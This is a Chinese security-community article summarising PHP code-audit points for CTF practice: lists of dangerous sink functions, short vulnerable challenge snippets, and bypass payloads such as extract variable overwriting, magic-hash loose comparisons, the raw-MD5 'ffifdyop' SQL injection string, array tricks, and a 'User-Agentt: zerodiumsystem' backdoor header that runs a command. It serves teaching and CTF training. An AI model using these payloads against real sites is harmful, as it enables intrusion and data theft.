php代码审计总结

白帽子社区

共 3775字,需浏览 8分钟

 ·

2021-09-21 14:24

作者:tzzzez  编辑:白帽子社区运营团队




    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    




在php中可由用户输入的变量

$_SERVER$_GET$_POST$_COOKIE$_REQUEST$_FILES

存在命令注入的函数

systemexecpassthrushell_execpopenproc_openpcntl_exec


XSS和CSRF的函

echoprintprintfvprintf<%=$test%>


存在文件包含的函数

includeinclude_oncerequirerequire_onceshow_sourcehighlite_filereadfileflie_get_contentsfopen


存在代码注入的函数

evalpreg_replaceassertcall_user_funccall_user_func_arraycreate_function


存在SQL注入的语句

insertupdateselectdelete


文件管理函数

copyrmdirunlinkdeletefwritechmodfgetcfgetcsvfgetsfgetssfilefile_get_contentsfreadreadfileftruncatefile_put_contentsfputcsvfputs


对于此类函数,可以使用php伪协议进行一个绕过。

<?php$a=$_GET['a'];if(stripos($a,'.')){    echo 'no';    return ;}$data = @file_get_contents($a,'r');if($data=="WHT is a good family!"){    require("flag.txt");    echo "flag";}?>


GET形式传入参数a,a不能含有.,且变量a必须为WHT is a good family!

使用php伪协议进行一个传参。


文件上传函数

move_uploaded_file

变量覆盖函数

extract



<?php $flag='flag.txt';extract($_GET); if(isset($a)) {    $content=trim(file_get_contents($flag));    //将flag文件的内容赋值给content变量    if($a==$content)    {        echo'ctf{xxx}';    }   else   {    echo'no';   }   } ?>


"extract($_GET)"此函数将GET传入的参数都重新赋值了, $content的值为flag.txt的内容,只有a和content的值相等时,才会输出flag,所以将$flag赋值一个不存在的文件,那么$content的值也就为空,此时$content也就变的可控了。

POC:

a=&flag=tzzzez


Session绕过


<?php $flag = "flag{xxxx}"; session_start();if (isset ($_GET['password'])) {    if ($_GET['password'] == $_SESSION['password'])        die ('Flag: '.$flag);    else        print 'Wrong';}mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));?>



Session的password在未登陆时为空,我们只要上传一个空的paasword即可绕过。


比较相等绕过

MD5md5('240610708')==md5('QNKCDZO')md5('aabg7XSs')==md5('aabC9RqS')SHA1sha1('aaroZmOk')==sha1('aaK1STfY')sha1('aaO8zKZF')==sha1('aa3OFF9m')明文'0010e2'=='1e3''0x1234Ab'=='1193131''0xABCdef'==' 0xABCdef'

弱类型整型比较

<?php error_reporting(0);$flag = "flag{test}"; $temp = $_GET['password'];is_numeric($temp)?die("no numeric");   if($temp>1336){    echo $flag;} ?>


当一个整形和一个其他类型行比较的时候,会先把其他类型intval再比。

POC:

password=1377a


MD5函数true绕过

$password = $_GET['password'];$sql = "SELECT * FROM users WHERE password = '".md5($password,true)."'";



ffifdyop
129581926211651571912466741651878684928


preg_match绕过

    1.数组绕过
    2.回溯次数限制绕过
    3.添加换行符 \n 和 %0a


strpos()绕过

    strpos()找的是字符串,那么传一个数组给它,strpos()出错返回null。


sha1()绕过

<?php $flag = "flag{xxxx}"; if (isset($_GET['name']) and isset($_GET['password'])){    if ($_GET['name'] == $_GET['password'])        echo 'Your password can not be your name!';    else if (sha1($_GET['name']) === sha1($_GET['password']))      die('Flag: '.$flag);    else        echo 'Invalid password.';}else    echo 'Login first!';?>


需要构造一对哈希值相等但明文不同的字符串,这里sha1函数无法处理数组,当处理数组时会报错返回False,这样就使得2个参数的哈希值“相等”,这里传参2个不同的数组即可绕过所有if。

MD5碰撞

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

0e开头的md5和原值:QNKCDZO0e830400451993494058024219903391QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675


PHP版本存在漏洞的函数

User-Agentt: zerodiumsystem("cat /flag");


值不等MD5相等,用两个不能MD5转换的值就可以。


传数组,strcmp()用两个无法比较的值,数组和字符串不可比较。



往期精彩文章




MISC中常用python脚本
第五空间网络安全大赛 WHT WRITEUP
羊城杯-WP
工作中最常用的Linux命令,排查问题必备




技术支持:白帽子社区团队
— 扫码关注我们 






浏览 45
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报